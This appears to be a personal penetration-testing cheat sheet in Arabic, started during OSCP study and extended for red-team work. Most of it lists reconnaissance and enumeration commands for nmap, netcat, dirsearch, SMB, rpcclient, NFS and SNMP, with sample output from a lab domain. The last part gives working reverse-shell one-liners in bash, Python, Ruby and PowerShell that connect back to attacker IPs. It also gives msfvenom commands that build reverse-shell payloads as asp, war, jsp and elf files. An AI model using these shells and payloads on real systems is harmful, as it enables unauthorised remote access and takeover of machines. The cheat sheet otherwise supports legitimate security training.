
هناك الكثير من أوراق الغش (Cheat Sheets) في العالم، لكن هذه ورقتي.
هناك العديد من أوراق الغش في الخارج، لكن هذه ورقة غش خاصة بي. إنها عمل قيد التطوير حاليًا، وتعيش كمسودة أولية يتم تحديثها كثيرًا، في بعض الأحيان. بدأت هذا العمل أثناء دراستي لشهادة OSCP، لكنه الآن يتطور ليشمل أشياء عملية أكثر أحتاجها كمختبر اختراق للفريق الأحمر (Red Teamer). الإضافات الجديدة على الأرجح لن تكون مفيدة في الامتحان، وقد تتضمن حتى أدوات محظورة.
غير مكتمل جدًا...
find / -name flag.txt للعثور على الملفات بالاسم.
grep -R "flag40" / -s -n للبحث عن سلسلة نصية في الملفات، مع البحث المتكرر بدءًا من الدليل الجذر، دون إظهار رسائل الخطأ.
dir /s flag.txt للعثور على ملفات باسم flag.txt في الدليل الحالي والدلائل الفرعية.
أداة مفيدة -> wadcoms.github.io
nmap -sn 10.11.1.0/24 مسح الشبكة للعثور على الأجهزة.
nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt فحص الشبكة بحثًا عن عناوين IP النشطة، وحفظ عناوين IP في قائمة.nmap -A 10.10.10.10 لفحص سريع لمنافذ TCP الشائعة مع اكتشاف نظام التشغيل والخدمات.
nmap -A 10.10.10.10 -p- لفحص جميع منافذ TCP مع اكتشاف نظام التشغيل والخدمات.
nmap -A -sU 10.10.10.10 لفحص جميع منافذ UDP مع اكتشاف نظام التشغيل والخدمات.
sudo nmap -O -A -sV 10.10.10.10 لفحص جميع منافذ TCP الشائعة، والتعرف على بصمة نظام التشغيل، وتشغيل السكريبتات، والتقاط اللافتات (banners).
proxychains nmap -Pn -sT 10.10.10.10 -v لأن فحوصات ICMP/UDP لا تعمل.
العلامة -w لتحديد المهلة بالثواني والعلامة -z لإرسال صفر بايت من البيانات (للفحص)
nc -nvv -w 1 -z 10.11.1.220 3388-3390 فحص TCP للمنافذ من 3388 إلى 3390.
nc -nv -u -z -w 1 10.11.1.115 160-162 فحص UDP للمنافذ من 160 إلى 162.
gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt.أنا أحب dirsearch أيضًا.
قوائم كلمات مفيدة على Kali
kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt rockyou.txt.gz wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery Fuzzing IOCs Miscellaneous Passwords Pattern-Matching Payloads README.md Usernames Web-Shells
kali@kali:~/Tools/dirsearch$
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r تعداد الدلائل باستخدام big.txt من dirb، انسخ والصق مع تغيير IP/URL والامتدادات.
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r تعداد الدلائل باستخدام قائمة الدلائل من dirbuster، انسخ والصق مع تغيير IP/URL والامتدادات.
python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r، تخمين ملفات CGI.
وحدة rsync هي في الأساس مشاركة دليل. يمكن حماية هذه الوحدات اختياريًا بكلمة مرور. هذا الخيار يسرد الوحدات المتاحة ويحدد اختياريًا ما إذا كانت الوحدة تتطلب كلمة مرور للوصول**:**
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
smbclient -L 10.11.1.146 لسرد المشاركات المتاحة
smbclient //10.11.1.146/IPC$ لتسجيل الدخول إلى تلك المشاركة. إذا لم يعمل ذلك، جرب باستخدام sudo... sudo smbclient //10.11.1.146/IPC$
enum4linux 10.11.1.146 -a -o لاستخدام enum4linux لأتمتة مشاركات smb.
إذا كان بإمكانك الاتصال بتسجيل دخول Null -> rpcclient -U '' -N forest.htb.
rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain: HTB
Server:
Comment:
Total Users: 105
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $>
showmount -e 10.10.10.10 لرؤية المشاركات المتاحة
mount -t nfs 10.10.10.10:/ /tmp -o nolock لتثبيت الدليل الجذر، أو أي مجلد آخر.
onesixtyone -c community -i ips لفحص الشبكة المستهدفة وتحديد خوادم SNMP حيث community وips قائمتان، community = (public, private, manager).
snmp-check 10.11.1.227 يقوم بكل ما يلي، لكن بشكل أفضل ويقوم بتنسيقه لك بشكل جميل :)
snmpwalk -c public -v1 -t 10 10.11.1.115 تعداد شجرة MIB بالكامل.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 تعداد مستخدمي Windows.
snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 تعداد عمليات Windows الجارية.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 تعداد منافذ TCP المفتوحة.
snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 تعداد البرامج المثبتة.
/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
nc -lvp 4444 الاستماع (لالتقاط) الشل العكسي باستخدام Netcat على المنفذ 4444
python -c 'import pty; pty.spawn("/bin/bash")' أو python3 -c 'import pty; pty.spawn("/bin/bash")'
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war
يعمل هذا أيضًا مع Cold Fusion بدلاً من الويب شل المعقد
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f raw > shell.jsp
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.133 LPORT=443 -f elf > shell.elf